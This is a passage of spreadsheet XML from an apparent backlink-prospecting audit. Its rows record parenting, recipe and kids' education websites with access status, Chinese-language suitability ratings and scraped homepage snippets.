        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M334" s="19" t="str">
        <x:v>https://twinsmommy.com/</x:v>
      </x:c>
      <x:c r="N334" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O334" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P334" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q334" s="21" t="str">
        <x:v>Twins Mommy – Learn to Start a Mom Blog Menu Start a Blog Start a List My Course About Blog FREE GUIDE Earn $5000/month from Pinterest with proven tactics My Freebies for You Affiliate Success Guide Learn the tips to get $1,000/month with affiliate marketing &amp;rarr; Ultimate Blog Plan 2026 Set up your business right with this free workbook &amp;rarr; Start Grow Earn Step-by-step email course on starting a profitable blogat &amp;rarr; Hi! I'm Elna! I'm married to my college sweetheart, a mom to wonderful twins and together we are the parent entrepreneur family. When my twins were barely a year old I started a freelance writing business from scratch with NO previous online or business experience. And w</x:v>
      </x:c>
      <x:c r="R334" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S334" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T334" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://twinsmommy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="335">
      <x:c r="A335" s="18" t="str">
        <x:v>334</x:v>
      </x:c>
      <x:c r="B335" s="19" t="str">
        <x:v>mymydiy.com</x:v>
      </x:c>
      <x:c r="C335" s="19" t="str">
        <x:v>https://mymydiy.com</x:v>
      </x:c>
      <x:c r="D335" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E335" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F335" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G335" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H335" s="19" t="str">
        <x:v>https://www.mymydiy.com/</x:v>
      </x:c>
      <x:c r="I335" s="19" t="str">
        <x:v>Home - MyMyDIY | Inspiring DIY Projects</x:v>
      </x:c>
      <x:c r="J335" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K335" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L335" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M335" s="19" t="str">
        <x:v>https://www.mymydiy.com/</x:v>
      </x:c>
      <x:c r="N335" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O335" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P335" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q335" s="21" t="str">
        <x:v>Need some DIY inspiration? Check out our free DIY plans for fun woodworking ideas- whether you're a pro or a DIY amateur. Home - MyMyDIY | Inspiring DIY Projects Facebook Pinterest Twitter Youtube Home Plans Ideas Fun Outdoor Plants Gardening Tools Bow Rakes Gardening Gloves Garden Spade Shovels String Trimmers Storage About Contact Search MYMYDIY Discover Your Next Project MYMYDIY DIY Plans &amp; Ideas MYMYDIY Discover Your Next Project Home Plans Plans How To Clean a Leather Purse: The Expert’s Guide to Maintaining Your Bag’s Beauty November 9, 2023 Plans How to Clean Candle Wax Off Floor: A Safe and Effective Guide for Hardwood Floors November 9, 2023 Plans How to Propagate Prayer Plant: A Step-by-Step Guide to Success November 9, 2023 Plans How To Get Slime Out Of Carpet: Effective Methods for Removing Slime – </x:v>
      </x:c>
      <x:c r="R335" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S335" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T335" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://mymydiy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="336">
      <x:c r="A336" s="18" t="str">
        <x:v>335</x:v>
      </x:c>
      <x:c r="B336" s="19" t="str">
        <x:v>tatnersstreetkitchen.com</x:v>
      </x:c>
      <x:c r="C336" s="19" t="str">
        <x:v>https://tatnersstreetkitchen.com</x:v>
      </x:c>
      <x:c r="D336" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E336" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F336" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G336" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H336" s="19" t="str">
        <x:v>https://tatnersstreetkitchen.com/</x:v>
      </x:c>
      <x:c r="I336" s="19" t="str">
        <x:v>Tatner's Street Kitchen -</x:v>
      </x:c>
      <x:c r="J336" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K336" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L336" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M336" s="19" t="str">
        <x:v>https://tatnersstreetkitchen.com/</x:v>
      </x:c>
      <x:c r="N336" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O336" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P336" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q336" s="21" t="str">
        <x:v>Tatner's Street Kitchen - Skip to content Tatner's Street Kitchen Menu Menu Privacy Policy About Us Contact Us 21 Seductively Sweet Banana Pepper Creations for Exquisite Palates August 12, 2026 by tatnersstreetkitchen Ready to transform humble banana peppers into something extraordinary? These 21 seductively sweet creations will delight your palate with vibrant flavors, from quick appetizers to comforting main dishes. Perfect for home cooks seeking a delicious twist, each recipe promises to elevate your meals with a touch of sweet heat. Dive in and discover how these … Read more Categories Other Recipes Leave a comment 29 Soulful Pizza Dips for Ultimate Flavor Escapades August 12, 2026 by ta</x:v>
      </x:c>
      <x:c r="R336" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S336" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T336" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://tatnersstreetkitchen.com</x:v>
      </x:c>
    </x:row>
    <x:row r="337">
      <x:c r="A337" s="18" t="str">
        <x:v>336</x:v>
      </x:c>
      <x:c r="B337" s="19" t="str">
        <x:v>gelarecipes.com</x:v>
      </x:c>
      <x:c r="C337" s="19" t="str">
        <x:v>https://gelarecipes.com</x:v>
      </x:c>
      <x:c r="D337" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E337" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F337" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G337" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H337" s="19" t="str">
        <x:v>https://gelarecipes.com/</x:v>
      </x:c>
      <x:c r="I337" s="19" t="str">
        <x:v>Home - Gela Recipes</x:v>
      </x:c>
      <x:c r="J337" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K337" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L337" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M337" s="19" t="str">
        <x:v>https://gelarecipes.com/</x:v>
      </x:c>
      <x:c r="N337" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O337" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P337" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q337" s="21" t="str">
        <x:v>Here are the most popular Dinner Recipes Home - Gela Recipes Skip to content Menu Home Breakfast Appetizer Dinner Dessert Drinks About Us Screwball Peanut Butter Whiskey Cocktails | Elevated Bar Craft Fruit Pizza with Cream Cheese – A Nutrient-Packed Dessert Revolution Grandma’s Cilantro-Lime Slaw: The Perfect Shrimp Taco Companion Orange Ricotta Pancakes: A Sun-Kissed Morning Romance Appetizer Recipes Turkey Cheese Ball: A Simple Holiday Appetizer Appetizer Recipes Broccoli Cheese Patties: Crispy, Healthy Comfort Food Appetizer Recipes Thanksgiving Cheese Board: A Family Tradition on a Platter Appetizer Recipes Cream Cheese Balls Recipe: Your New Party Obsession Appetizer Recipes dinner Here are the most popular Dinner Recipes 13 </x:v>
      </x:c>
      <x:c r="R337" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S337" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T337" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://gelarecipes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="338">
      <x:c r="A338" s="18" t="str">
        <x:v>337</x:v>
      </x:c>
      <x:c r="B338" s="19" t="str">
        <x:v>mombrite.com</x:v>
      </x:c>
      <x:c r="C338" s="19" t="str">
        <x:v>https://mombrite.com</x:v>
      </x:c>
      <x:c r="D338" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E338" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F338" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G338" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H338" s="19" t="str">
        <x:v>https://www.mombrite.com/</x:v>
      </x:c>
      <x:c r="I338" s="19" t="str">
        <x:v>Mombrite | Fun STEM Activities, Science Experiments &amp; Crafts for Kids</x:v>
      </x:c>
      <x:c r="J338" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K338" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L338" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M338" s="19" t="str">
        <x:v>https://www.mombrite.com/</x:v>
      </x:c>
      <x:c r="N338" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O338" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P338" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q338" s="21" t="str">
        <x:v>Discover fun STEM activities, easy science experiments, creative crafts, and free printables for kids. Hands-on learning made simple for busy parents. Mombrite | Fun STEM Activities, Science Experiments &amp; Crafts for Kids Skip to content Main Menu Crafts &amp; Art Handprint Crafts Nature Crafts Painting &amp; Art Paper Crafts Slime &amp; Sensory Play Science Experiments Biology and Life Science Chemistry Earth &amp; Space Physics &amp; Engineering STEM Activities LEGO STEM Math Activities STEM Challenges Technology and Coding Printables Games &amp; Activities Templates &amp; Coloring Pages Worksheets Seasonal Christmas Easter Fall Father’s Day Halloween July 4th Mother’s Day Spring St. Patrick’s Day Summer Thanksgiving Valentine’s Day Winter SHOP Search for: Search Discover Fun STEM Activities &amp; Easy Crafts for Kids Simple science experiments, creative projects, and f</x:v>
      </x:c>
      <x:c r="R338" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S338" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T338" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mombrite.com</x:v>
      </x:c>
    </x:row>
    <x:row r="339">
      <x:c r="A339" s="18" t="str">
        <x:v>338</x:v>
      </x:c>
      <x:c r="B339" s="19" t="str">
        <x:v>acultivatednest.com</x:v>
      </x:c>
      <x:c r="C339" s="19" t="str">
        <x:v>https://acultivatednest.com</x:v>
      </x:c>
      <x:c r="D339" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E339" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F339" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G339" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H339" s="19" t="str">
        <x:v>https://acultivatednest.com/</x:v>
      </x:c>
      <x:c r="I339" s="19" t="str">
        <x:v>A Cultivated Nest - Helping You Manage Your Home and Life on a Budget</x:v>
      </x:c>
      <x:c r="J339" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K339" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L339" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M339" s="19" t="str">
        <x:v>https://acultivatednest.com/</x:v>
      </x:c>
      <x:c r="N339" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O339" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P339" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q339" s="21" t="str">
        <x:v>Welcome to A Cultivated Nest! You'll find frugal living tips, budget decorating ideas, gardening tips, recipes from scratch, upcycling ideas and much more. A Cultivated Nest - Helping You Manage Your Home and Life on a Budget Home About Me Contact Me Privacy Policy, Cookie Policy, &amp; Disclosures Terms Our Books Shop Shop Cart Help A Cultivated Nest Helping You Manage Your Home and Life on a Budget Frugal Living All Frugal Living Frugal Kids Activities Budgeting Printables Cleaning + Organizing All Cleaning + Organization Organizing Tips Cleaning Tips DIY Cleaning Products Freebies Resource Library All Free Printables Budget Printables Home Decor Printables Home Management Printables Budget Decorating Recipes All Recipes Breakfast Recipes Snack Recipes Appetizer Recipes Drink Recipes Dinner Recipes Dessert Recipes DIY + Crafts All DIYs Kids Craft</x:v>
      </x:c>
      <x:c r="R339" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S339" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T339" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://acultivatednest.com</x:v>
      </x:c>
    </x:row>
    <x:row r="340">
      <x:c r="A340" s="18" t="str">
        <x:v>339</x:v>
      </x:c>
      <x:c r="B340" s="19" t="str">
        <x:v>clothbooksforbaby.com</x:v>
      </x:c>
      <x:c r="C340" s="19" t="str">
        <x:v>https://clothbooksforbaby.com</x:v>
      </x:c>
      <x:c r="D340" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E340" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F340" s="20"/>
      <x:c r="G340" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H340" s="19" t="str"/>
      <x:c r="I340" s="19" t="str"/>
      <x:c r="J340" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K340" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L340" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M340" s="19" t="str">
        <x:v>https://clothbooksforbaby.com</x:v>
      </x:c>
      <x:c r="N340" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O340" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P340" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q340" s="21" t="str"/>
      <x:c r="R340" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S340" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T340" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://clothbooksforbaby.com
http://clothbooksforbaby.com</x:v>
      </x:c>
    </x:row>
    <x:row r="341">
      <x:c r="A341" s="18" t="str">
        <x:v>340</x:v>
      </x:c>
      <x:c r="B341" s="19" t="str">
        <x:v>liveoaknest.com</x:v>
      </x:c>
      <x:c r="C341" s="19" t="str">
        <x:v>https://liveoaknest.com</x:v>
      </x:c>
      <x:c r="D341" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E341" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F341" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G341" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H341" s="19" t="str">
        <x:v>https://liveoaknest.com/</x:v>
      </x:c>
      <x:c r="I341" s="19" t="str">
        <x:v>Home - Live Oak Nest</x:v>
      </x:c>
      <x:c r="J341" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K341" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L341" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M341" s="19" t="str">
        <x:v>https://liveoaknest.com/</x:v>
      </x:c>
      <x:c r="N341" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O341" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P341" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q341" s="21" t="str">
        <x:v>Discover timeless cottage home decor, beautiful DIY projects, and cozy decorating inspiration for creating a home that is well loved and truly lived in. Home - Live Oak Nest Skip to content Home About Contact search for decor inspiration, DIYs, &amp; more Start Here Shop Home for Christmas Shop My Home Shop My Favorites Shop My Storefront Shop My Amazon Storefront Shop LTK Blog Decor All Home Decor Year-round Inspo Spring Summer Fall Winter Home Tours Cleaning &amp; Organization DIY Projects Year-round Crafts Spring Summer Fall Winter Valentines Furniture Makeovers Faith Freebies Free Digital Library Free Cozy Corner Guide Free Mood Board Collection search for decor inspiration, DIYs, &amp; more inspiration for a timeless home Create a beautiful home that is well loved and truly lived in. start here browse the blog shop my home shop my favorites shop my</x:v>
      </x:c>
      <x:c r="R341" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S341" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T341" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://liveoaknest.com</x:v>
      </x:c>
    </x:row>
    <x:row r="342">
      <x:c r="A342" s="18" t="str">
        <x:v>341</x:v>
      </x:c>
      <x:c r="B342" s="19" t="str">
        <x:v>mumscreativecupboard.com</x:v>
      </x:c>
      <x:c r="C342" s="19" t="str">
        <x:v>https://mumscreativecupboard.com</x:v>
      </x:c>
      <x:c r="D342" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E342" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F342" s="20"/>
      <x:c r="G342" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H342" s="19" t="str"/>
      <x:c r="I342" s="19" t="str"/>
      <x:c r="J342" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K342" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L342" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M342" s="19" t="str">
        <x:v>https://mumscreativecupboard.com</x:v>
      </x:c>
      <x:c r="N342" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O342" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P342" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q342" s="21" t="str"/>
      <x:c r="R342" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S342" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T342" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://mumscreativecupboard.com
http://mumscreativecupboard.com</x:v>
      </x:c>
    </x:row>
    <x:row r="343">
      <x:c r="A343" s="18" t="str">
        <x:v>342</x:v>
      </x:c>
      <x:c r="B343" s="19" t="str">
        <x:v>tccwz.com</x:v>
      </x:c>
      <x:c r="C343" s="19" t="str">
        <x:v>https://tccwz.com</x:v>
      </x:c>
      <x:c r="D343" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E343" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F343" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G343" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H343" s="19" t="str">
        <x:v>https://tccwz.com/</x:v>
      </x:c>
      <x:c r="I343" s="19" t="str">
        <x:v>leyu乐鱼（中国）官方网站 - leyu.com</x:v>
      </x:c>
      <x:c r="J343" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K343" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L343" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M343" s="19" t="str">
        <x:v>https://tccwz.com/</x:v>
      </x:c>
      <x:c r="N343" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O343" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P343" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q343" s="21" t="str">
        <x:v>leyu网址是华语地区综合体育服务平台，沉浸式体验如临顶级赛事现场！官网首页入口提供网页版/APP双入口便捷注册登录，手机版地址永续稳定，随时随地畅享精彩！引领专业竞技潮流，分享运动激情与荣耀时刻，全心服务您的体育生活，共筑活力未来！ leyu乐鱼（中国）官方网站 - leyu.com 注册入口 App 公司简介 体育头条 全天更新 · leyu 赛事实时同步 无论您身在何处， leyuAPP 为您带来高速、高清、稳定的观赛体验。 下载客户端 网页端访问 leyu · 值得信赖的体育数据平台 leyu 专注于构建一个以赛事内容、数据服务与智能分析为核心的数字生态平台，聚焦全球体育用户的实时信息与多终端互动体验。平台以稳定技术架构和合规体系赢得市场认可，深受乐鱼用户喜爱。 技术驱动，性能优先 平台采用自研系统架构，持续优化加载速度与数据传输流程，通过部署全球 CDN 加速节点，实现不同地区高速访问与高并发下的稳定运行，全面提升用户操作流畅度。 以信任构建口碑 所有服务均基于合规化机制运营，平台数据透明、交易流程规范，长期致力于构建高可信度生态系统，持续服务全球数百万用户，树立良好品牌形象。 多语言，多区域 支持多语种界面与主流货币结算方式，leyu 已服务覆盖东南亚、欧洲、中东等重点市场，具备全球运营与本地适配的服务能力。 持续优化，数据驱动 平台基于用户行为分析，不断迭代功能细节与视觉交互体验，结合 AI 智能算法与赛事数据，为用户提供精准内容分发与个性化推荐，增强整体互动价值。 为什么全球用户都信赖leyu？ 我们不仅是体育赛事数据平台，更是一站式的信息服务提供商。从实时数据同步到安全机制建设，再到用户服务体系，leyu始终致力于为全球用户带来可靠、高效、便捷的综合体验。 7x24 小时客服支持 无论是深夜浏览还是假期咨询，我们的专业客服团队全年在线，提供多语种支持，第一时间响应各类技术及账户问题，保障服务</x:v>
      </x:c>
      <x:c r="R343" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S343" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T343" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://tccwz.com</x:v>
      </x:c>
    </x:row>
    <x:row r="344">
      <x:c r="A344" s="18" t="str">
        <x:v>343</x:v>
      </x:c>
      <x:c r="B344" s="19" t="str">
        <x:v>sunnysprouts.blog</x:v>
      </x:c>
      <x:c r="C344" s="19" t="str">
        <x:v>https://sunnysprouts.blog</x:v>
      </x:c>
      <x:c r="D344" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E344" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F344" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G344" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H344" s="19" t="str">
        <x:v>https://sunnysprouts.blog/</x:v>
      </x:c>
      <x:c r="I344" s="19" t="str">
        <x:v>Sunny Sprouts by Miss Jane – a site for the sunny minds of the developing child &amp; resources for fellow CAS students</x:v>
      </x:c>
      <x:c r="J344" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K344" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L344" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M344" s="19" t="str">
        <x:v>https://sunnysprouts.blog/</x:v>
      </x:c>
      <x:c r="N344" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O344" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P344" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q344" s="21" t="str">
        <x:v>a site for the sunny minds of the developing child &amp; resources for fellow CAS students Sunny Sprouts by Miss Jane – a site for the sunny minds of the developing child &amp; resources for fellow CAS students Skip to content Free Templates here! Sunny Sprouts by Miss Jane Search Home About Blog Activity Ideas Snacktivities Language and Literacy Math Concepts Key Concepts Theory Inquiries Open-Ended Concepts Free Templates Activity Ideas , Blog , Math Concepts Cookies and Milk AB Patterning Sheets Help your child or students learn foundational patterning concepts with this fun Cookies and Milk AB Patterning sheet! This patterning sheet is a low-prep activity; simply download, print-out, laminate for endless uses, and cut! Use in tandem with books such as If You Give A Mouse a Cookie </x:v>
      </x:c>
      <x:c r="R344" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S344" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T344" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sunnysprouts.blog</x:v>
      </x:c>
    </x:row>
    <x:row r="345">
      <x:c r="A345" s="18" t="str">
        <x:v>344</x:v>
      </x:c>
      <x:c r="B345" s="19" t="str">
        <x:v>paper-and-glue.com</x:v>
      </x:c>
      <x:c r="C345" s="19" t="str">
        <x:v>https://paper-and-glue.com</x:v>
      </x:c>
      <x:c r="D345" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E345" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F345" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G345" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H345" s="19" t="str">
        <x:v>https://www.paper-and-glue.com/</x:v>
      </x:c>
      <x:c r="I345" s="19" t="str">
        <x:v>What Can We Do With Paper And Glue</x:v>
      </x:c>
      <x:c r="J345" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K345" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L345" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M345" s="19" t="str">
        <x:v>https://www.paper-and-glue.com/</x:v>
      </x:c>
      <x:c r="N345" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O345" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P345" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q345" s="21" t="str">
        <x:v>Easy crafts and activities for kids. What Can We Do With Paper And Glue MENU MENU SEARCH Header$type=menu Home About _About The Author _Privacy &amp; Disclosure _Contact Books _Book Lists _Resources For Choosing Children's Books _Book Extensions Preschool _Complete Weekly Theme Units _52 Theme Ideas _Preschool Planning Elementary Activities By Category _123s &amp; Math _ABCs &amp; Literacy _Crafts _Fine Motor _Gross Motor _Nature Play _Process Art _Science _Sensory _Seasonal __Winter __Spring __Summer __Fall _Snacks Holidays _Valentine's Day _St. Patrick's Day _Easter _CInco de Mayo _Independence Day _Halloween _Thanksgiving _Christmas Family _Preschool Planning _Tips &amp; Tricks _Sewing Tutorials Header$type=social_icons |LATEST_$type=bloggi</x:v>
      </x:c>
      <x:c r="R345" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S345" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T345" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://paper-and-glue.com</x:v>
      </x:c>
    </x:row>
    <x:row r="346">
      <x:c r="A346" s="18" t="str">
        <x:v>345</x:v>
      </x:c>
      <x:c r="B346" s="19" t="str">
        <x:v>seasonsinparenting.com</x:v>
      </x:c>
      <x:c r="C346" s="19" t="str">
        <x:v>https://seasonsinparenting.com</x:v>
      </x:c>
      <x:c r="D346" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E346" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F346" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G346" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H346" s="19" t="str">
        <x:v>https://seasonsinparenting.com/</x:v>
      </x:c>
      <x:c r="I346" s="19" t="str">
